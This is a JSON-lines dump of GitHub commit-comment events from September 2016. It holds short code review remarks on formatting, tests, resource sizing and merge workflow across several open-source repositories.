{"id":"4626071013","type":"CommitCommentEvent","actor":{"login":"colemonnahan"},"repo":{"name":"admb-project/admb"},"payload":{"comment":{"id":19195695,"position":null,"line":null,"path":null,"commit_id":"985b2730314665e9964239b1a52187f21cb1ed0d","created_at":"2016-09-27T18:29:07Z","updated_at":"2016-09-27T18:29:07Z","body":"@johnoel I already made a find_reasonable_stepsize function that is working in sHMC. We will just reuse that I imagine.\r\n\r\nhttps://github.com/admb-project/admb/blob/master/src/nh99/hmc.cpp#L619"}},"created_at":"2016-09-27T18:29:07Z"}
{"id":"4626073270","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195703,"position":144,"line":144,"path":"lib/node_modules/@stdlib/utils/pluck/README.md","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:29:29Z","updated_at":"2016-09-27T18:29:29Z","body":"And when changed to valid syntax, needs to be offset with newlines, as an HTML comment is a block in Markdown."}},"created_at":"2016-09-27T18:29:29Z"}
{"id":"4626075926","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195709,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/pluck/lib/index.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:29:57Z","updated_at":"2016-09-27T18:29:57Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T18:29:57Z"}
{"id":"4626076209","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195710,"position":148,"line":148,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:30:01Z","updated_at":"2016-09-27T18:30:01Z","body":"Not sure what you mean."}},"created_at":"2016-09-27T18:30:01Z"}
{"id":"4626079481","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195716,"position":24,"line":24,"path":"lib/node_modules/@stdlib/utils/pluck/lib/pluck.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:30:33Z","updated_at":"2016-09-27T18:30:33Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T18:30:33Z"}
{"id":"4626080556","type":"CommitCommentEvent","actor":{"login":"boveloco"},"repo":{"name":"boveloco/Angry-Birds"},"payload":{"comment":{"id":19195721,"position":null,"line":null,"path":null,"commit_id":"7f58c3ea5725550e7edaa6a60db49866b4ab4dc7","created_at":"2016-09-27T18:30:43Z","updated_at":"2016-09-27T18:30:43Z","body":"Errei o projeto que estava mexendo...\r\nTenho que criar um branch pra dev! \r\nMEH!"}},"created_at":"2016-09-27T18:30:43Z"}
{"id":"4626081985","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195727,"position":70,"line":70,"path":"lib/node_modules/@stdlib/utils/pluck/lib/pluck.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:30:59Z","updated_at":"2016-09-27T18:30:59Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T18:30:59Z"}
{"id":"4626082296","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195729,"position":306,"line":306,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:31:02Z","updated_at":"2016-09-27T18:31:02Z","body":"I believe so too. I'll remove the sleeps and test it."}},"created_at":"2016-09-27T18:31:02Z"}
{"id":"4626083838","type":"CommitCommentEvent","actor":{"login":"vskin4u"},"repo":{"name":"githubteacher/sep-27-developers"},"payload":{"comment":{"id":19195738,"position":null,"line":null,"path":null,"commit_id":"2aa724e9cf187597979839eda06372d3b5492eec","created_at":"2016-09-27T18:31:17Z","updated_at":"2016-09-27T18:31:17Z","body":":+1: "}},"created_at":"2016-09-27T18:31:17Z"}
{"id":"4626085127","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195743,"position":5,"line":5,"path":"lib/node_modules/@stdlib/utils/pluck/lib/validate.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:31:31Z","updated_at":"2016-09-27T18:31:31Z","body":"Add TODO to replace with `is-plain-object`."}},"created_at":"2016-09-27T18:31:31Z"}
{"id":"4626086210","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195746,"position":23,"line":23,"path":"lib/node_modules/@stdlib/utils/pluck/lib/validate.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:31:42Z","updated_at":"2016-09-27T18:31:42Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T18:31:42Z"}
{"id":"4626086904","type":"CommitCommentEvent","actor":{"login":"the-braveknight"},"repo":{"name":"RehabMan/Intel-NUC-DSDT-Patch"},"payload":{"comment":{"id":19195752,"position":null,"line":null,"path":null,"commit_id":"8c40056634b520f0e6fb3517c4b83381dba19409","created_at":"2016-09-27T18:31:49Z","updated_at":"2016-09-27T18:31:49Z","body":"Oh I see..."}},"created_at":"2016-09-27T18:31:49Z"}
{"id":"4626088676","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195758,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/pluck/package.json","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:32:08Z","updated_at":"2016-09-27T18:32:08Z","body":"Why `stdmath`?"}},"created_at":"2016-09-27T18:32:08Z"}
{"id":"4626098386","type":"CommitCommentEvent","actor":{"login":"MineJoke"},"repo":{"name":"ccldev/v2-compile-sytems"},"payload":{"comment":{"id":19195783,"position":null,"line":null,"path":null,"commit_id":"b27e59cdf2edea94e151de024b855e8f37b93aeb","created_at":"2016-09-27T18:33:52Z","updated_at":"2016-09-27T18:33:52Z","body":"Thx 🔢 "}},"created_at":"2016-09-27T18:33:52Z"}
{"id":"4626098413","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195784,"position":73,"line":73,"path":"lib/node_modules/@stdlib/utils/pluck/test/test.validate.js","commit_id":"24f87b6bf3d7865a4d5ca4b2be60252b873c3a73","created_at":"2016-09-27T18:33:52Z","updated_at":"2016-09-27T18:33:52Z","body":"Add test case to check that destination properties are set."}},"created_at":"2016-09-27T18:33:52Z"}
{"id":"4626101179","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195794,"position":418,"line":418,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:34:21Z","updated_at":"2016-09-27T18:34:21Z","body":"It was arbitrarily determined. I mainly wanted to make sure there was enough ram for the alignment process so that it wouldn't go into mem-swap when scaling this think up to whole genome. I believe, but I could be wrong, that I read that this step required a lot of RAM so I'm not sure. These job resource requirements will be fleshed out when I stress test this pipeline on whole genomes."}},"created_at":"2016-09-27T18:34:21Z"}
{"id":"4626103024","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"galaxyproject/galaxy-lib"},"payload":{"comment":{"id":19195798,"position":36,"line":36,"path":"galaxy/tools/deps/container_resolvers/mulled.py","commit_id":"e228ace83735b964f94b2f1ea94a35cc042849cd","created_at":"2016-09-27T18:34:41Z","updated_at":"2016-09-27T18:34:41Z","body":"LooseVersion, this is great. I was wondering how we get this correct but did not find a nice solution. This is great!"}},"created_at":"2016-09-27T18:34:41Z"}
{"id":"4626105055","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19195801,"position":89,"line":89,"path":"libse/SubtitleFormats/SubUrbia.cs","commit_id":"6f9a71ba8b7732f84805e23b35ca2794695644f3","created_at":"2016-09-27T18:35:01Z","updated_at":"2016-09-27T18:35:01Z","body":"thx :)\r\nFixed in b2783962ace561f09b284b4b81241e56153f28fe "}},"created_at":"2016-09-27T18:35:01Z"}
{"id":"4626105455","type":"CommitCommentEvent","actor":{"login":"varunika91"},"repo":{"name":"varunika91/varunika91.github.io"},"payload":{"comment":{"id":19195803,"position":8,"line":8,"path":"style.css","commit_id":"d23e230ac5a6ed143a8b6f921855a5c1e7a7d884","created_at":"2016-09-27T18:35:06Z","updated_at":"2016-09-27T18:35:06Z","body":"adding white bckgrnd"}},"created_at":"2016-09-27T18:35:06Z"}
{"id":"4626109029","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195814,"position":508,"line":508,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:35:46Z","updated_at":"2016-09-27T18:35:46Z","body":"Correct, there's some redundancies in which files were pulled into which jobs. That needs to be cleaned up."}},"created_at":"2016-09-27T18:35:46Z"}
{"id":"4626112317","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195824,"position":112,"line":112,"path":"lib/node_modules/@stdlib/utils/deep-set/README.md","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:36:20Z","updated_at":"2016-09-27T18:36:20Z","body":"Spacing appears off. `'` should be aligned with `b`."}},"created_at":"2016-09-27T18:36:20Z"}
{"id":"4626115509","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195830,"position":76,"line":76,"path":"lib/node_modules/@stdlib/utils/deep-set/README.md","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:36:53Z","updated_at":"2016-09-27T18:36:53Z","body":"Spacing appears off. `v` should be aligned with `t`. (4 spaces)"}},"created_at":"2016-09-27T18:36:53Z"}
{"id":"4626116425","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195834,"position":48,"line":48,"path":"lib/node_modules/@stdlib/utils/deep-set/README.md","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:37:02Z","updated_at":"2016-09-27T18:37:02Z","body":"Spacing."}},"created_at":"2016-09-27T18:37:02Z"}
{"id":"4626117520","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195839,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-27T18:37:14Z","updated_at":"2016-09-27T18:37:14Z","body":"Thanks - I encountered DeMorgan's Law a while back. Can you give me an\nexample of when you've had to use it in actual code?\n\nOn Tue, Sep 27, 2016 at 12:22 PM, Joe Tsai <notifications@github.com> wrote:\n\n> BTW, just something I found myself using a lot.\n>\n> If you're not already familiar, you should memorize a transformation known\n> as DeMorgan's Law <https://en.wikipedia.org/wiki/De_Morgan%27s_laws>.\n> It's very useful for re-writing the conditional statement of an\n> if-statement.\n>\n> Essentially, the law says that the following two expressions are\n> equivalent (assuming A and B are bools):\n>\n>    - !(a && b) == (!a || !b)\n>\n> Similarly,\n>\n>    - !(a || b) == (!a && !b)\n>\n> It's helpful for rewriting complex conditionals into one thats easier for\n> the human to parse.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19194451>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib1w_RyL1lEroH6sy4nHbMch1HvUtvks5quVDYgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-27T18:37:14Z"}
{"id":"4626118577","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195841,"position":135,"line":135,"path":"lib/node_modules/@stdlib/utils/deep-set/README.md","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:37:27Z","updated_at":"2016-09-27T18:37:27Z","body":"Spacing."}},"created_at":"2016-09-27T18:37:27Z"}
{"id":"4626120551","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195844,"position":517,"line":517,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:37:47Z","updated_at":"2016-09-27T18:37:47Z","body":"I've heard that the Toil cache has been having issues. I'm not entirely sure about what the status is with that feature right now. I guess I would plan to move over to using Toil cache when most of its bugs are ironed out."}},"created_at":"2016-09-27T18:37:47Z"}
{"id":"4626125385","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195857,"position":21,"line":21,"path":"lib/node_modules/@stdlib/utils/deep-set/lib/deep_set.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:38:38Z","updated_at":"2016-09-27T18:38:38Z","body":"opts -> options to match function signature below."}},"created_at":"2016-09-27T18:38:38Z"}
{"id":"4626125397","type":"CommitCommentEvent","actor":{"login":"ljieyao"},"repo":{"name":"adrianwadrzyk/MLM"},"payload":{"comment":{"id":19195858,"position":null,"line":null,"path":null,"commit_id":"932378826fc5d06a8319ad1d42330230e227163c","created_at":"2016-09-27T18:38:38Z","updated_at":"2016-09-27T18:38:38Z","body":"how to use?"}},"created_at":"2016-09-27T18:38:38Z"}
{"id":"4626130542","type":"CommitCommentEvent","actor":{"login":"spirosara"},"repo":{"name":"spirosara/Assignments"},"payload":{"comment":{"id":19195873,"position":null,"line":null,"path":null,"commit_id":"c668b1befcaf45b97ff5dbb1932e7df467a67e62","created_at":"2016-09-27T18:39:33Z","updated_at":"2016-09-27T18:39:33Z","body":"My CV picture!"}},"created_at":"2016-09-27T18:39:33Z"}
{"id":"4626130770","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"tarazanova-olga/learning_java"},"payload":{"comment":{"id":19195874,"position":16,"line":54,"path":"addressbook_web_tests/src/test/java/my/learning_java/addressbook/appmanager/ContactHelper.java","commit_id":"92004bb618466a617e532963ade2ac29ca19fda1","created_at":"2016-09-27T18:39:35Z","updated_at":"2016-09-27T18:39:35Z","body":"public void createContact(ContactData contact) - здесь одного параметра достаточно"}},"created_at":"2016-09-27T18:39:35Z"}
{"id":"4626131872","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19195878,"position":15,"line":0,"path":"libraries/stdlib/src/kotlin/collections/AbstractCollection.kt","commit_id":"df5c628bbc5a211f12d5b866e4ffd0cc3cf3c598","created_at":"2016-09-27T18:39:47Z","updated_at":"2016-09-27T18:39:47Z","body":"Turns out it's ok for collection to have referential equality, when it's neither list nor set. So I'm removing these abstract overrides and they become inherited from `Any`."}},"created_at":"2016-09-27T18:39:47Z"}
{"id":"4626132144","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"iBrunch/bloc-jams"},"payload":{"comment":{"id":19195879,"position":14,"line":14,"path":"index.html","commit_id":"1bad0458e4524322eed6fc797f189ed18a017cab","created_at":"2016-09-27T18:39:50Z","updated_at":"2016-09-27T18:39:50Z","body":"This whole thing should be section instead of \"Main\", the  sections inside it should be divs"}},"created_at":"2016-09-27T18:39:50Z"}
{"id":"4626132232","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195880,"position":22,"line":22,"path":"lib/node_modules/@stdlib/utils/deep-set/lib/dset.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:39:51Z","updated_at":"2016-09-27T18:39:51Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T18:39:51Z"}
{"id":"4626133003","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"tarazanova-olga/learning_java"},"payload":{"comment":{"id":19195881,"position":18,"line":56,"path":"addressbook_web_tests/src/test/java/my/learning_java/addressbook/appmanager/ContactHelper.java","commit_id":"92004bb618466a617e532963ade2ac29ca19fda1","created_at":"2016-09-27T18:39:59Z","updated_at":"2016-09-27T18:39:59Z","body":"fillContactPage(contact, true); - здесь можно сразу вызвать true"}},"created_at":"2016-09-27T18:39:59Z"}
{"id":"4626135146","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195887,"position":19,"line":19,"path":"lib/node_modules/@stdlib/utils/deep-set/lib/factory.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:40:22Z","updated_at":"2016-09-27T18:40:22Z","body":"`opt` -> `options` to match function signature below."}},"created_at":"2016-09-27T18:40:22Z"}
{"id":"4626138377","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195900,"position":16,"line":16,"path":"lib/node_modules/@stdlib/utils/deep-set/lib/index.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:40:56Z","updated_at":"2016-09-27T18:40:56Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T18:40:56Z"}
{"id":"4626140049","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19195908,"position":4,"line":246,"path":"api/src/main/resources/liquibase.xml","commit_id":"fd6af572ec8e040c6b673d000d2d86f1c74f5ad1","created_at":"2016-09-27T18:41:14Z","updated_at":"2016-09-27T18:41:14Z","body":"author here should be you @jamesfeshner and not me!"}},"created_at":"2016-09-27T18:41:14Z"}
{"id":"4626140862","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195911,"position":25,"line":25,"path":"lib/node_modules/@stdlib/utils/deep-set/lib/validate.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:41:22Z","updated_at":"2016-09-27T18:41:22Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T18:41:22Z"}
{"id":"4626141369","type":"CommitCommentEvent","actor":{"login":"kilbee"},"repo":{"name":"frmdstryr/garden.mapview"},"payload":{"comment":{"id":19195912,"position":null,"line":null,"path":null,"commit_id":"8e101d5cf21206b2e192beab5a382f7615ca42ad","created_at":"2016-09-27T18:41:27Z","updated_at":"2016-09-27T18:41:27Z","body":"Can you use cythonized source on mobile (android)?"}},"created_at":"2016-09-27T18:41:27Z"}
{"id":"4626142416","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195918,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/deep-set/package.json","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:41:38Z","updated_at":"2016-09-27T18:41:38Z","body":"Why `stdmath`?"}},"created_at":"2016-09-27T18:41:38Z"}
{"id":"4626144119","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195922,"position":60,"line":60,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.dset.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:41:55Z","updated_at":"2016-09-27T18:41:55Z","body":"Test message."}},"created_at":"2016-09-27T18:41:55Z"}
{"id":"4626145959","type":"CommitCommentEvent","actor":{"login":"FerrariHD"},"repo":{"name":"AlexCherednik450502/ZIG.ZAG"},"payload":{"comment":{"id":19195925,"position":null,"line":null,"path":null,"commit_id":"5783c5092a5cab09a1d5c0451e3c514390453542","created_at":"2016-09-27T18:42:14Z","updated_at":"2016-09-27T18:42:14Z","body":"Вполне неплохо. Главное реализовать не хуже :)"}},"created_at":"2016-09-27T18:42:14Z"}
{"id":"4626146409","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195929,"position":167,"line":167,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.dset.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:42:19Z","updated_at":"2016-09-27T18:42:19Z","body":"Test message."}},"created_at":"2016-09-27T18:42:19Z"}
{"id":"4626146947","type":"CommitCommentEvent","actor":{"login":"blasten"},"repo":{"name":"PolymerElements/iron-list"},"payload":{"comment":{"id":19195930,"position":97,"line":1306,"path":"iron-list.html","commit_id":"eb532c6dcd2ea43d91e545858210c079e2baeeea","created_at":"2016-09-27T18:42:24Z","updated_at":"2016-09-27T18:42:24Z","body":"this was causing a recalc even if using the `itemSize` prop to cache the heights."}},"created_at":"2016-09-27T18:42:24Z"}
{"id":"4626147448","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195932,"position":562,"line":562,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:42:29Z","updated_at":"2016-09-27T18:42:29Z","body":"The work_dir doesn't exist until I read in the files from the `job.fileStore` into it using the `read_global_directory`. I'm mainly just passing the location of work_dir from job to job in the pipeline to have a location where all of the temporary files are that's consistent. It was mainly for making debugging easier. Functionally I believe it doesn't make much difference than in making a temporary directory."}},"created_at":"2016-09-27T18:42:29Z"}
{"id":"4626147751","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195933,"position":218,"line":218,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.dset.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:42:32Z","updated_at":"2016-09-27T18:42:32Z","body":"Test message."}},"created_at":"2016-09-27T18:42:32Z"}
{"id":"4626149427","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195938,"position":267,"line":267,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.dset.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:42:48Z","updated_at":"2016-09-27T18:42:48Z","body":"Test message."}},"created_at":"2016-09-27T18:42:48Z"}
{"id":"4626151504","type":"CommitCommentEvent","actor":{"login":"bgoodri"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19195943,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T18:43:09Z","updated_at":"2016-09-27T18:43:09Z","body":"Should say that `scaled` is ignored if `QR = TRUE`."}},"created_at":"2016-09-27T18:43:09Z"}
{"id":"4626153242","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195947,"position":773,"line":773,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:43:27Z","updated_at":"2016-09-27T18:43:27Z","body":"I'll remove it then, unless Glenn needs it."}},"created_at":"2016-09-27T18:43:27Z"}
{"id":"4626153774","type":"CommitCommentEvent","actor":{"login":"DanIverson"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19195950,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T18:43:32Z","updated_at":"2016-09-27T18:43:32Z","body":"If you fixed the > redirect in ovjmacout.sh then I think it is ready to PR\nfrom development to master. I will have one more commit before doing the\nfinal tag and release build. It is a minor change to add an extract script\nso that chempack updates can be added to OVJ. I am waiting for you to merge\nsrc/common/SConstruct so I don't have to manually merge my change.\n\nWhen I type in a commit number into that box, the Able to merge message\ngoes away and the window goes into a \"Comparing changes\" mode. There is no\nlonger a \"Merge pull request\" button.\n\nYes, I think we decided the git hash was too confusing.\n\n\nOn Tue, Sep 27, 2016 at 11:27 AM, Timothy Burrow <notifications@github.com>\nwrote:\n\n> Is it OK to PR where we are now in development over to master? I won't\n> squash, so you can retrieve your commit point.\n>\n> See the screen shot I have for making a pull request; does branch, tag,\n> commit or history marker work? I just assumed it would.\n>\n> [image: screen shot 2016-09-27 at 2 18 05 pm]\n> <https://cloud.githubusercontent.com/assets/3519577/18886299/4eb5c214-84bd-11e6-864a-dbd041a0d7ed.png>\n>\n> Small thing: the installed OVJ has a date in /vnmr/vnmrrev but no git\n> hash, which is in /vnmr/adm/sha1. Was it decided that the hash was too\n> confusing to be in the text window?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenVnmrJ/OpenVnmrJ/commit/e0d0ff9fb2400e3fe9fc40314607482871d9e911#commitcomment-19195659>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANelBvkUU7lpG85LfqGWe7_GPfOUoI3mks5quWAOgaJpZM4KH2Fd>\n> .\n>\n"}},"created_at":"2016-09-27T18:43:32Z"}
{"id":"4626155521","type":"CommitCommentEvent","actor":{"login":"richteer"},"repo":{"name":"Halibot/halibot"},"payload":{"comment":{"id":19195954,"position":null,"line":null,"path":null,"commit_id":"5f967abc711463bf677da6d8685bea055bb9aa49","created_at":"2016-09-27T18:43:51Z","updated_at":"2016-09-27T18:43:51Z","body":":+1: "}},"created_at":"2016-09-27T18:43:51Z"}
{"id":"4626155913","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195958,"position":149,"line":149,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:43:55Z","updated_at":"2016-09-27T18:43:55Z","body":"Test message."}},"created_at":"2016-09-27T18:43:55Z"}
{"id":"4626157006","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195966,"position":155,"line":155,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:44:07Z","updated_at":"2016-09-27T18:44:07Z","body":"Test message."}},"created_at":"2016-09-27T18:44:07Z"}
{"id":"4626161522","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195974,"position":99,"line":99,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.validate.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:44:51Z","updated_at":"2016-09-27T18:44:51Z","body":"Add test case to test that destination props are set."}},"created_at":"2016-09-27T18:44:51Z"}
{"id":"4626161787","type":"CommitCommentEvent","actor":{"login":"yeputons"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19195977,"position":195,"line":218,"path":"pagespeed/system/redis_cache_cluster_test.cc","commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-27T18:44:54Z","updated_at":"2016-09-27T18:44:54Z","body":"Setting everything in `TestCaseSetUp` is not really good because some tests alter Cluster configuration and we want to reset it back afterwards. `RedisCacheClusterTestWithReconfiguration` was created exactly to do Cluster reconfiguration after such tests only."}},"created_at":"2016-09-27T18:44:54Z"}
{"id":"4626162263","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19195978,"position":80,"line":80,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T18:44:58Z","updated_at":"2016-09-27T18:44:58Z","body":"предлагаю пока отавить так как есть"}},"created_at":"2016-09-27T18:44:58Z"}
